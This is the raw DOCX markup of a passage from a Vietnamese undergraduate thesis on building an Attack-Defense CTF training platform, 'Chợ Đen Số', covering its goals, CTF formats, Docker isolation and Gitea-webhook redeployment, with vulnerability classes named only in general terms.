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Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>BỘ GIÁO DỤC VÀ ĐÀO TẠO</w:t>
        <w:br/>
        <w:t>TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="720" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>----------***----------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="600" w:after="480" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>BÁO CÁO TỐT NGHIỆP ĐỒ ÁN</w:t>
        <w:br/>
        <w:t>ĐẠI HỌC CHUYÊN NGÀNH AN TOÀN THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="960" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>NGHIÊN CỨU VÀ XÂY DỰNG NỀN TẢNG THI ĐẤU</w:t>
        <w:br/>
        <w:t>AN TOÀN THÔNG TIN ATTACK-DEFENSE CTF</w:t>
        <w:br/>
        <w:t>"CHỢ ĐEN SỐ"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1600" w:after="480" w:line="336" w:lineRule="auto"/>
        <w:ind w:left="2880"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giáo viên hướng dẫn:  ThS. Nguyễn Văn A</w:t>
        <w:br/>
        <w:t>Sinh viên thực hiện:  Phạm Võ Toàn Đức</w:t>
        <w:br/>
        <w:t>Mã số sinh viên:      20123456</w:t>
        <w:br/>
        <w:t>Lớp:                  ATTT-K15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1600" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hà Nội, Năm 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>MỤC LỤC BÁO CÁO ĐỒ ÁN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHƯƠNG 1: MỞ ĐẦU ........................................................................................................ 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHƯƠNG 2: CƠ SỞ LÝ THUYẾT ......................................................................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHƯƠNG 3: PHÂN TÍCH VÀ THIẾT KẾ HỆ THỐNG ................................................................ 9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHƯƠNG 4: XÂY DỰNG VÀ PHÂN TÍCH CHI TIẾT MÃ NGUỒN ................................................. 13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHƯƠNG 5: KHAI THÁC VÀ VÁ 7 LỖ HỔNG BẢO MẬT ......................................................... 19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHƯƠNG 6: ĐÁNH GIÁ VÀ THỬ NGHIỆM HỆ THỐNG ............................................................. 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN ..................................................................................... 29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 1: MỞ ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.1. Lý do chọn đề tài</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Trong kỷ nguyên số hóa mạnh mẽ, an toàn thông tin (ATTT) đã trở thành một yếu tố sống còn đối với sự sống còn và phát triển của mọi cơ quan, tổ chức, doanh nghiệp. Tuy nhiên, việc đào tạo nguồn nhân lực ATTT chất lượng cao tại Việt Nam và trên thế giới đang đối mặt với thách thức lớn về sự chênh lệch giữa lý thuyết và thực tiễn. Thí sinh và học viên thường nắm rõ lý thuyết nhưng thiếu cơ hội cọ xát với các kịch bản xâm nhập và xử lý sự cố thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Các cuộc thi Capture The Flag (CTF) là giải pháp hàng đầu để giải quyết khoảng cách này. Trong đó, mô hình Attack-Defense (Tấn công và Phòng thủ) được xem là hình thức thực hành đỉnh cao, phản ánh chân thực nhất hoạt động đối kháng an ninh mạng ngoài đời thực. Khác với mô hình Jeopardy truyền thống mang tính chất tĩnh, Attack-Defense đòi hỏi người chơi phải liên tục phát hiện lỗ hổng trên dịch vụ của đối thủ để tấn công (Attack), đồng thời lập tức vá các lỗ hổng tương tự trên hệ thống nhà (Defense) dưới áp lực thời gian của từng vòng đấu (Round). Đặc biệt, hệ thống phải luôn đảm bảo tính khả dụng của các tính năng kinh doanh cốt lõi (cam kết SLA). Do đó, đề tài "Nghiên cứu và xây dựng nền tảng thi đấu an toàn thông tin Attack-Defense CTF 'Chợ Đen Số'" được lựa chọn nhằm thiết kế một hệ thống thi đấu CTF tinh gọn, thực tiễn và tự động hóa cao.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.2. Mục tiêu đề tài</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Đồ án hướng tới hoàn thành các mục tiêu cụ thể sau:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nghiên cứu sâu sắc kiến trúc vận hành của các giải đấu CTF theo mô hình đối kháng Attack-Defense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Thiết kế và cài đặt Gameserver chịu trách nhiệm sinh flag, ghi nhận điểm số, và giám sát tính khả dụng (SLA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Xây dựng dịch vụ thực tế dễ bị tổn thương (vuln-service) lấy chủ đề sàn giao dịch "Chợ Đen Số" tích hợp sẵn 7 nhóm lỗ hổng phổ biến thuộc OWASP Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Xây dựng cơ chế CI/CD tự động dựa trên Git và Webhook kết hợp với container hóa (Docker) giúp người chơi vá lỗi hệ thống cực kỳ nhanh chóng và an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.3. Đối tượng và phạm vi nghiên cứu</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Đối tượng nghiên cứu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Các lỗ hổng ứng dụng web phổ biến (SQL Injection, Command Injection, Race Condition, IDOR, BOLA, Weak Crypto, Info Disclosure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hệ thống quản lý container và cô lập tài nguyên mạng (Docker &amp; Docker Compose).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Quy trình tích hợp và triển khai liên tục (CI/CD) qua Git và Webhooks.</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Phạm vi nghiên cứu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Xây dựng mô hình giả lập gồm 2 đội thi trực tiếp (Team 1 và Team 2) kết nối qua mạng nội bộ ảo cô lập.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ứng dụng web được phát triển bằng ngôn ngữ Python sử dụng micro-framework Flask và SQLite database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.4. Phương pháp nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Đồ án sử dụng phương pháp nghiên cứu lý thuyết kết hợp thực nghiệm thực tiễn. Tiến hành khảo sát các mô hình hệ thống CTF mã nguồn mở hiện nay (như CTFd, Mellivora). Từ đó, đề xuất một kiến trúc hệ thống gọn nhẹ, có khả năng triển khai nhanh trên các dòng máy chủ cấu hình vừa phải nhưng vẫn đảm bảo tính cô lập và bảo mật cao nhờ Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 2: CƠ SỞ LÝ THUYẾT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.1. Tổng quan về Capture The Flag (CTF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Capture The Flag (CTF) trong lĩnh vực an toàn thông tin là một hình thức thi đấu học thuật thực hành, nơi thí sinh được thử thách thông qua việc giải quyết các bài toán bảo mật thực tế để tìm kiếm một chuỗi bí mật gọi là Flag. Flag thường được ẩn giấu trong một tệp tin hệ thống, một bảng trong cơ sở dữ liệu, một biến môi trường hoặc trong bộ nhớ ram của tiến trình đang chạy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.2. Các mô hình thi đấu CTF phổ biến</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hiện nay, các giải đấu CTF trên thế giới được vận hành theo ba mô hình chính:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Jeopardy: Mô hình tĩnh, người chơi giải các thử thách độc lập thuộc nhiều mảng (Web, Cryptography, PWN, Reverse, Forensics). Điểm số thường cố định hoặc giảm dần theo số lượng đội giải được (Dynamic Scoring).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>King of the Hill: Thí sinh tấn công một hoặc một nhóm máy chủ mục tiêu chung do ban tổ chức dựng sẵn. Mục tiêu là chiếm quyền root/admin và ghi tên đội mình vào tệp tin chỉ định. Đội nào giữ được vị trí "vua" lâu nhất sẽ nhận nhiều điểm nhất.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attack-Defense: Mô hình đối kháng trực tiếp. Mỗi đội có một cụm dịch vụ ảo giống hệt nhau. Các đội vừa phải phân tích mã nguồn hệ thống nhà để vá lỗi, vừa phải tấn công dịch vụ của các đội khác để lấy Flag. Đây là mô hình toàn diện và khó nhất vì nó đòi hỏi cả tư duy tấn công lẫn phòng thủ thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.3. Công nghệ ảo hóa Container (Docker)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Docker là nền tảng mã nguồn mở cho phép đóng gói ứng dụng và tất cả các thành phần phụ thuộc của nó vào trong một đơn vị ảo hóa nhẹ gọi là Container. So với máy ảo truyền thống (Virtual Machine) vốn yêu cầu chạy một hệ điều hành khách (Guest OS) đầy đủ, Docker Container chia sẻ chung nhân hệ điều hành (Kernel) của máy Host và cô lập tài nguyên ở tầng ứng dụng bằng cách sử dụng các tính năng của nhân Linux như Namespaces và Control Groups (cgroups).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ưu điểm lớn nhất của Docker trong triển khai CTF là tính cô lập (Isolation) và tính nhẹ (Lightweight). Admin có thể khởi chạy hàng chục container dịch vụ cho các đội chơi chỉ trong vài giây mà không làm cạn kiệt tài nguyên RAM/CPU của máy chủ vật lý. Docker Compose được sử dụng để định nghĩa và chạy các ứng dụng đa container thông qua cấu hình tệp YAML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.4. Cơ chế Gitea Webhook và CI/CD tự động</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Gitea là một dịch vụ Git tự lưu trữ (self-hosted) cực kỳ gọn nhẹ và hiệu quả được viết bằng ngôn ngữ Go. Gitea hỗ trợ đầy đủ các API và Webhook. Webhook là một cơ chế cho phép một hệ thống gửi thông báo thời gian thực đến một hệ thống khác khi xảy ra một sự kiện cụ thể.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Trong đồ án này, khi người chơi hoàn thành việc vá lỗi trên máy cá nhân và chạy lệnh `git push` lên Gitea Server, Gitea sẽ gửi một HTTP POST request chứa payload JSON mô tả chi tiết commit đó sang dịch vụ `deploy-webhook`. Dịch vụ này lập tức phân tích, kéo mã nguồn mới nhất và ra lệnh cho Docker Engine khởi động lại container dịch vụ của đội đó. Quy trình này mô phỏng chặt chẽ luồng CI/CD trong các doanh nghiệp hiện đại.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.5. Khái niệm về các lỗi bảo mật ứng dụng Web phổ biến</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Các lỗ hổng ứng dụng web trong đồ án được xây dựng dựa trên danh sách OWASP Top 10 - tài liệu tiêu chuẩn mô tả các nguy cơ an ninh mạng nghiêm trọng nhất. Các lỗi này bao gồm SQL Injection (truy vấn DB trái phép), Command Injection (thực thi mã hệ thống), Race Condition (lỗi tranh chấp tài nguyên), IDOR/BOLA (truy cập đối tượng không phân quyền), Weak Cryptography (sử dụng mật mã yếu dễ bẻ khóa) và Information Disclosure (rò rỉ dữ liệu nhạy cảm).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 3: PHÂN TÍCH VÀ THIẾT KẾ HỆ THỐNG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.1. Phân tích yêu cầu hệ thống</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Yêu cầu chức năng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
